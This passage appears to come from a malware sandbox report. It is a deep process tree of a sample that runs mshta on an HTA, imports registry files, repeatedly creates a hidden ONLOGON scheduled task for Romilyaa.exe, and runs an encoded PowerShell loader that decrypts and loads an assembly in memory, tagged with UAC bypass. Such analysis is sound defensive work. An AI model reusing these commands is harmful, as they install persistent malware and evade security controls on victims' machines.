                                                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                            4⤵
                                                            • Blocklisted process makes network request
                                                            PID:6712
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                                                            4⤵
                                                              PID:6732
                                                              • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                                                                WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:6864
                                                                • C:\Users\Admin\AppData\Local\Temp\is-7GH9P.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-7GH9P.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10392,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:6936
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                                                                    7⤵
                                                                      PID:7024
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im winaerotweaker.exe /f
                                                                        8⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4824
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                                                                      7⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:7064
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im winaerotweakerhelper.exe /f
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2764
                                                            • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\regmess.exe
                                                              regmess.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:6392
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_3d0e9ebf-8e11-4a25-a11e-b3bae0267330\regmess.bat" "
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:6512
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg import Setup.reg /reg:32
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:6596
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg import Console.reg /reg:32
                                                                  5⤵
                                                                    PID:6684
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg import Desktop.reg /reg:32
                                                                    5⤵
                                                                    • Sets desktop wallpaper using registry
                                                                    PID:6720
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg import International.reg /reg:32
                                                                    5⤵
                                                                      PID:6800
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg import Fonts.reg /reg:32
                                                                      5⤵
                                                                      • Modifies Internet Explorer settings
                                                                      PID:7072
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg import Cursors.reg /reg:32
                                                                      5⤵
                                                                        PID:7144
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 10
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Delays execution with timeout.exe
                                                                    PID:6408
                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\scary.exe
                                                                    scary.exe
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:6332
                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                      4⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:6356
                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                      4⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:6508
                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                        5⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:6868
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aEXFHh5zRoc3.bat" "
                                                                        5⤵
                                                                          PID:6696
                                                                          • C:\Windows\system32\chcp.com
                                                                            chcp 65001
                                                                            6⤵
                                                                              PID:4460
                                                                            • C:\Windows\system32\PING.EXE
                                                                              ping -n 10 localhost
                                                                              6⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:3260
                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                              6⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:6344
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                7⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:5936
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wxe2a9FizKwp.bat" "
                                                                                7⤵
                                                                                  PID:5324
                                                                                  • C:\Windows\system32\chcp.com
                                                                                    chcp 65001
                                                                                    8⤵
                                                                                      PID:4216
                                                                                    • C:\Windows\system32\PING.EXE
                                                                                      ping -n 10 localhost
                                                                                      8⤵
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      • Runs ping.exe
                                                                                      PID:7056
                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                      8⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:6632
                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                        9⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:6008
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fa2i1oDen4Qg.bat" "
                                                                                        9⤵
                                                                                          PID:3116
                                                                                          • C:\Windows\system32\chcp.com
                                                                                            chcp 65001
                                                                                            10⤵
                                                                                              PID:3392
                                                                                            • C:\Windows\system32\PING.EXE
                                                                                              ping -n 10 localhost
                                                                                              10⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:5772
                                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                              10⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4188
                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                11⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:3384
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PNJxRhA4xRtE.bat" "
                                                                                                11⤵
                                                                                                  PID:400
                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                    chcp 65001
                                                                                                    12⤵
                                                                                                      PID:7000
                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                      ping -n 10 localhost
                                                                                                      12⤵
                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                      • Runs ping.exe
                                                                                                      PID:6860
                                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                      12⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4428
                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                        13⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:6480
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D0dlcwOpfWJa.bat" "
                                                                                                        13⤵
                                                                                                          PID:5364
                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                            chcp 65001
                                                                                                            14⤵
                                                                                                              PID:528
                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                              ping -n 10 localhost
                                                                                                              14⤵
                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                              • Runs ping.exe
                                                                                                              PID:5984
                                                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                              14⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3808
                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                15⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:4004
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FVmvLJr95Hd3.bat" "
                                                                                                                15⤵
                                                                                                                  PID:1072
                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                    chcp 65001
                                                                                                                    16⤵
                                                                                                                      PID:5840
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      ping -n 10 localhost
                                                                                                                      16⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:5352
                                                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                      16⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                      PID:4888
                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                        17⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:6764
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hd4cylztVXOK.bat" "
                                                                                                                        17⤵
                                                                                                                          PID:6612
                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                            chcp 65001
                                                                                                                            18⤵
                                                                                                                              PID:4972
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping -n 10 localhost
                                                                                                                              18⤵
                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:3988
                                                                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                              18⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                              PID:6772
                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                19⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:4972
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RYUjuty5j44X.bat" "
                                                                                                                                19⤵
                                                                                                                                  PID:4396
                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                    chcp 65001
                                                                                                                                    20⤵
                                                                                                                                      PID:6700
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping -n 10 localhost
                                                                                                                                      20⤵
                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                      • Runs ping.exe
                                                                                                                                      PID:5244
                                                                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                      20⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:3528
                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                        21⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:792
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xgl47gPmnHhh.bat" "
                                                                                                                                        21⤵
                                                                                                                                          PID:1800
                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                            chcp 65001
                                                                                                                                            22⤵
                                                                                                                                              PID:3480
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping -n 10 localhost
                                                                                                                                              22⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:6432
                                                                                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                              22⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:5132
                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                23⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:5384
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1ynOZgQ0eLde.bat" "
                                                                                                                                                23⤵
                                                                                                                                                  PID:5416
                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                    chcp 65001
                                                                                                                                                    24⤵
                                                                                                                                                      PID:4108
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping -n 10 localhost
                                                                                                                                                      24⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:5232
                                                                                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                      24⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:2480
                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                        25⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:4012
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foovyd1NFOYo.bat" "
                                                                                                                                                        25⤵
                                                                                                                                                          PID:6408
                                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                                            chcp 65001
                                                                                                                                                            26⤵
                                                                                                                                                              PID:2224
                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                              ping -n 10 localhost
                                                                                                                                                              26⤵
                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:1500
                                                                                                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                              26⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:2040
                                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                                27⤵
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:1908
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\I9l6dGTGsxaV.bat" "
                                                                                                                                                                27⤵
                                                                                                                                                                  PID:2520
                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                    chcp 65001
                                                                                                                                                                    28⤵
                                                                                                                                                                      PID:5532
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping -n 10 localhost
                                                                                                                                                                      28⤵
                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:4124
                                                                                                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                                      28⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:5424
                                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                                        29⤵
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:5580
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LjjjVHnLUNCE.bat" "
                                                                                                                                                                        29⤵
                                                                                                                                                                          PID:4332
                                                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                                                            chcp 65001
                                                                                                                                                                            30⤵
                                                                                                                                                                              PID:2424
                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                              ping -n 10 localhost
                                                                                                                                                                              30⤵
                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                              PID:3448
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\the.exe
                                                                                                                        the.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6280
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                                                                          4⤵
                                                                                                                          • UAC bypass
                                                                                                                          • Windows security bypass
                                                                                                                          • Manipulates Digital Signatures
                                                                                                                          • Suspicious use of SetThreadContext
